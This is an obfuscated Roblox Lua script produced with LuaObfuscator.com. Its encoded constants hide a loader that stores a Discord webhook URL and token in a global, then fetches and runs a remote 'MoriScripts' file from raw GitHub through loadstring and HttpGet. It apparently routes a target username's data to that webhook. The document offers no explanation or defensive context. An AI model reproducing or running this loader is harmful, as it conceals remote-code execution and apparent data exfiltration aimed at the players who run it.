--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v82=0;while true do if (v82==0) then v19=v0(v3(v30,1,1));return "";end end else local v83=0;local v84;while true do if (v83==0) then v84=v2(v0(v30,16));if v19 then local v101=0;local v102;while true do if (v101==0) then v102=v5(v84,v19);v19=nil;v101=1;end if (v101==1) then return v102;end end else return v84;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v85=(v31/(2^(v32-(2 -1))))%((5 -3)^(((v33-(1 -0)) -(v32-((1 + 1) -1))) + (878 -(282 + 595)))) ;return v85-(v85%(620 -(555 + 64))) ;else local v86=(933 -(857 + 74))^(v32-(569 -(367 + 51 + 150))) ;return (((v31%(v86 + v86))>=v86) and (928 -(214 + 713))) or 0 ;end end local function v21()local v34=0;local v35;while true do if (v34==((2703 -(68 + 997)) -(1523 + 114))) then return v35;end if (v34==0) then v35=v1(v16,v18,v18);v18=v18 + 1 + 0 ;v34=1 -0 ;end end end local function v22()local v36=0 + 0 ;local v37;local v38;while true do if (v36==1) then return (v38 * (1526 -(226 + 1044))) + v37 ;end if (v36==(0 -(0 -0))) then v37,v38=v1(v16,v18,v18 + (119 -(32 + (435 -(87 + 263)))) );v18=v18 + (4 -2) ;v36=1 -0 ;end end end local function v23()local v39,v40,v41,v42=v1(v16,v18,v18 + (183 -(67 + 113)) );v18=v18 + (11 -8) + 1 ;return (v42 * 16777216) + (v41 * (160901 -95365)) + (v40 * (189 + 67)) + v39 ;end local function v24()local v43=0;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (v43==((304 + 651) -(802 + 150))) then if (v48==(0 -0)) then if (v47==(0 -0)) then return v49 * (0 + 0) ;else local v103=997 -(915 + 68 + 14) ;while true do if (v103==(0 -0)) then v48=1 + 0 ;v46=772 -(201 + 571) ;break;end end end elseif (v48==2047) then return ((v47==0) and (v49 * ((1 -0)/(1187 -(1069 + 118))))) or (v49 * NaN) ;end return v8(v49,v48-(2320 -1297) ) * (v46 + (v47/((3 -1)^(10 + 42)))) ;end if (v43==(1140 -(116 + 1022))) then v48=v20(v45,21,31);v49=((v20(v45,56 -24 )==(1 + 0)) and  -(792 -((1531 -1163) + 423))) or (3 -2) ;v43=21 -(10 + 8) ;end if (v43==(3 -2)) then v46=443 -(416 + 26) ;v47=(v20(v45,3 -2 ,9 + 7 + 4 ) * ((3 -(3 -2))^(470 -(145 + 293)))) + v44 ;v43=432 -(44 + 386) ;end if (v43==0) then v44=v23();v45=v23();v43=1487 -((3543 -2545) + 488) ;end end end local function v25(v50)local v51=859 -(814 + (154 -109)) ;local v52;local v53;while true do if (v51==(4 -2)) then v53={};for v89=(1748 -(760 + 987)) + 0 , #v52 do v53[v89]=v2(v1(v3(v52,v89,v89)));end v51=2 + 1 ;end if (1==v51) then v52=v3(v16,v18,(v18 + v50) -(886 -(261 + (2537 -(1789 + 124)))) );v18=v18 + v50 ;v51=(769 -(745 + 21)) -1 ;end if (v51==(1080 -(1020 + 60))) then v52=nil;if  not v50 then local v95=1423 -(630 + 273 + 520) ;while true do if ((0 -(0 -0))==v95) then v50=v23();if (v50==(0 -0)) then return "";end break;end end end v51=1;end if (v51==(2 + 1)) then return v6(v53);end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v54=156 -(142 + 14) ;local v55;local v56;local v57;local v58;local v59;local v60;while true do local v67=1793 -(1563 + 230) ;while true do if (v67~=(285 -(134 + 151))) then else if (v54==(1667 -(970 + 695))) then local v98=0 -0 ;local v99;while true do if (v98==0) then v99=0;while true do local v105=0;while true do if (0~=v105) then else if (v99==1) then return v58;end if (v99~=(1990 -(582 + 1408))) then else local v125=0 -0 ;while true do if (v125==0) then for v164=1 -0 ,v23() do local v165=0 -0 ;local v166;local v167;local v168;while true do if (v165==1) then v168=nil;while true do if (v166~=(1825 -(1195 + 629))) then else while true do if (v167==(0 -0)) then v168=v21();if (v20(v168,242 -(187 + 54) ,1)~=(780 -(162 + 618))) then else local v178=0;local v179;local v180;local v181;local v182;while true do if (v178==(0 + 0)) then local v183=0 + 0 ;while true do if ((0 -0)~=v183) then else v179=0;v180=nil;v183=1;end if (v183==1) then v178=1;break;end end end if (v178==2) then while true do if (v179==(1 -0)) then v182={v22(),v22(),nil,nil};if (v180==0) then local v188=0;local v189;while true do if (v188==0) then v189=0 + 0 ;while true do if (v189==0) then v182[3]=v22();v182[4]=v22();break;end end break;end end elseif (v180==(1 -0)) then v182[4 -1 ]=v23();elseif (v180==2) then v182[3]=v23() -((1386 -(746 + 638))^(7 + 9)) ;elseif (v180==3) then local v200=0 -0 ;local v201;local v202;local v203;while true do if (v200~=(341 -(218 + 123))) then else v201=1581 -(1535 + 46) ;v202=nil;v200=1;end if (v200~=1) then else v203=nil;while true do if (v201~=(0 + 0)) then else v202=0;v203=nil;v201=1 + 0 ;end if (v201==1) then while true do if (v202==0) then v203=0;while true do if (v203==(560 -(306 + 254))) then v182[3]=v23() -((1 + 1)^(30 -14)) ;v182[4]=v22();break;end end break;end end break;end end break;end end end v179=1469 -(899 + 568) ;end if ((0 + 0)==v179) then local v185=0 -0 ;while true do if (v185~=1) then else v179=604 -(268 + 335) ;break;end if (v185==0) then v180=v20(v168,292 -(60 + 230) ,3);v181=v20(v168,4,6);v185=1;end end end if (v179==3) then if (v20(v181,3,575 -(426 + 146) )==(1 + 0)) then v182[1460 -(282 + 1174) ]=v60[v182[4]];end v55[v164]=v182;break;end if (v179==(813 -(569 + 242))) then local v187=0 -0 ;while true do if (v187==0) then if (v20(v181,1 + 0 ,1025 -(706 + 318) )~=1) then else v182[2]=v60[v182[1253 -(721 + 530) ]];end if (v20(v181,2,2)==1) then v182[1274 -(945 + 326) ]=v60[v182[3]];end v187=1;end if (v187==1) then v179=7 -4 ;break;end end end end break;end if (v178==(1 + 0)) then local v184=700 -(271 + 429) ;while true do if (0==v184) then v181=nil;v182=nil;v184=1 + 0 ;end if (1~=v184) then else v178=1502 -(1408 + 92) ;break;end end end end end break;end end break;end if (v166==(1086 -(461 + 625))) then local v177=1288 -(993 + 295) ;while true do if (v177==(1 + 0)) then v166=1;break;end if (v177==(1171 -(418 + 753))) then v167=0;v168=nil;v177=1 + 0 ;end end end end break;end if (v165==0) then v166=0;v167=nil;v165=1;end end end for v169=1,v23() do v56[v169-(1 + 0) ]=v28();end v125=1 + 0 ;end if (v125==(1 + 0)) then v99=1;break;end end end break;end end end break;end end end if (v54==(530 -(406 + 123))) then local v100=1769 -(1749 + 20) ;while true do if (0~=v100) then else v59=v23();v60={};v100=1 + 0 ;end if ((1323 -(1249 + 73))~=v100) then else for v106=1 + 0 ,v59 do local v107=0;local v108;local v109;local v110;while true do if (v107~=(1146 -(466 + 679))) then else v110=nil;while true do if (v108~=1) then else if (v109==(2 -1)) then v110=v21()~=(0 -0) ;elseif (v109==2) then v110=v24();elseif (v109~=3) then else v110=v25();end v60[v106]=v110;break;end if ((1900 -(106 + 1794))==v108) then local v150=0 + 0 ;while true do if (v150~=0) then else v109=v21();v110=nil;v150=1;end if (v150~=(1 + 0)) then else v108=1;break;end end end end break;end if (v107~=0) then else v108=0 -0 ;v109=nil;v107=2 -1 ;end end end v58[117 -(4 + 110) ]=v21();v100=586 -(57 + 527) ;end if (v100==(1429 -(41 + 1386))) then v54=105 -(17 + 86) ;break;end end end v67=1;end if (v67==(1 + 0)) then if (v54~=0) then else v55={};v56={};v57={};v58={v55,v56,nil,v57};v54=1;end break;end end end end local function v29(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v68=v64;local v69=v65;local v70=v66;local v71=v27;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v87=0,v76 do if (v87>=v70) then v74[v87-v70 ]=v75[v87 + 1 ];else v78[v87]=v75[v87 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do local v88=0;while true do if (v88==1) then if (v81<=10) then if (v81<=4) then if (v81<=1) then if (v81>0) then v78[v80[2]]=v80[3];else v78[v80[2]]();end elseif (v81<=2) then local v113=v80[2];v78[v113]=v78[v113](v13(v78,v113 + 1 ,v73));elseif (v81==3) then do return;end else v72=v80[3];end elseif (v81<=7) then if (v81<=5) then if (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end elseif (v81>6) then local v128=v80[2];v78[v128]=v78[v128](v13(v78,v128 + 1 ,v73));else v72=v80[3];end elseif (v81<=8) then local v115=0;local v116;local v117;while true do if (v115==1) then v78[v116 + 1 ]=v117;v78[v116]=v117[v80[4]];break;end if (v115==0) then v116=v80[2];v117=v78[v80[3]];v115=1;end end elseif (v81>9) then v78[v80[2]][v80[3]]=v80[4];else v78[v80[2]]=v63[v80[3]];end elseif (v81<=15) then if (v81<=12) then if (v81>11) then v78[v80[2]]=v63[v80[3]];else v78[v80[2]]();end elseif (v81<=13) then v78[v80[2]][v80[3]]=v80[4];elseif (v81>14) then local v135=0;local v136;local v137;local v138;local v139;while true do if (v135==1) then v73=(v138 + v136) -1 ;v139=0;v135=2;end if (v135==0) then v136=v80[2];v137,v138=v71(v78[v136](v13(v78,v136 + 1 ,v80[3])));v135=1;end if (v135==2) then for v171=v136,v73 do local v172=0;while true do if (0==v172) then v139=v139 + 1 ;v78[v171]=v137[v139];break;end end end break;end end else local v140=v80[2];local v141,v142=v71(v78[v140](v13(v78,v140 + 1 ,v80[3])));v73=(v142 + v140) -1 ;local v143=0;for v156=v140,v73 do local v157=0;while true do if (v157==0) then v143=v143 + 1 ;v78[v156]=v141[v143];break;end end end end elseif (v81<=18) then if (v81<=16) then if (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end elseif (v81>17) then do return;end else v78[v80[2]]=v80[3]~=0 ;end elseif (v81<=19) then local v122=0;local v123;local v124;while true do if (1==v122) then v78[v123 + 1 ]=v124;v78[v123]=v124[v80[4]];break;end if (v122==0) then v123=v80[2];v124=v78[v80[3]];v122=1;end end elseif (v81==20) then v78[v80[2]]=v80[3];else v78[v80[2]]=v80[3]~=0 ;end v72=v72 + 1 ;break;end if (0==v88) then v80=v68[v72];v81=v80[1];v88=1;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!0C3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B037A3O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O313233373430362O353738313431373031302F74426D2D6970495F552D735A4750332O425F4C646E7642326155506B666D454A724F616B47776D6542554E666557793031346650634279714F666F4A755536435A2O4C4F20030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A03083O00557365724E616D65030B3O004842534B494E473738362003093O00557365724E616D653200173O0012013O00013O0026053O000E000100020004063O000E0001001209000100033O00300D000100040005001209000100063O001209000200073O002013000200020008001201000400094O0011000500014O000E000200054O000200013O00022O000B0001000100010004063O001600010026053O0001000100010004063O00010001001209000100033O00300D0001000A000B001209000100033O00300D0001000C000B0012013O00023O0004063O000100012O00123O00017O00",v9(),...);end
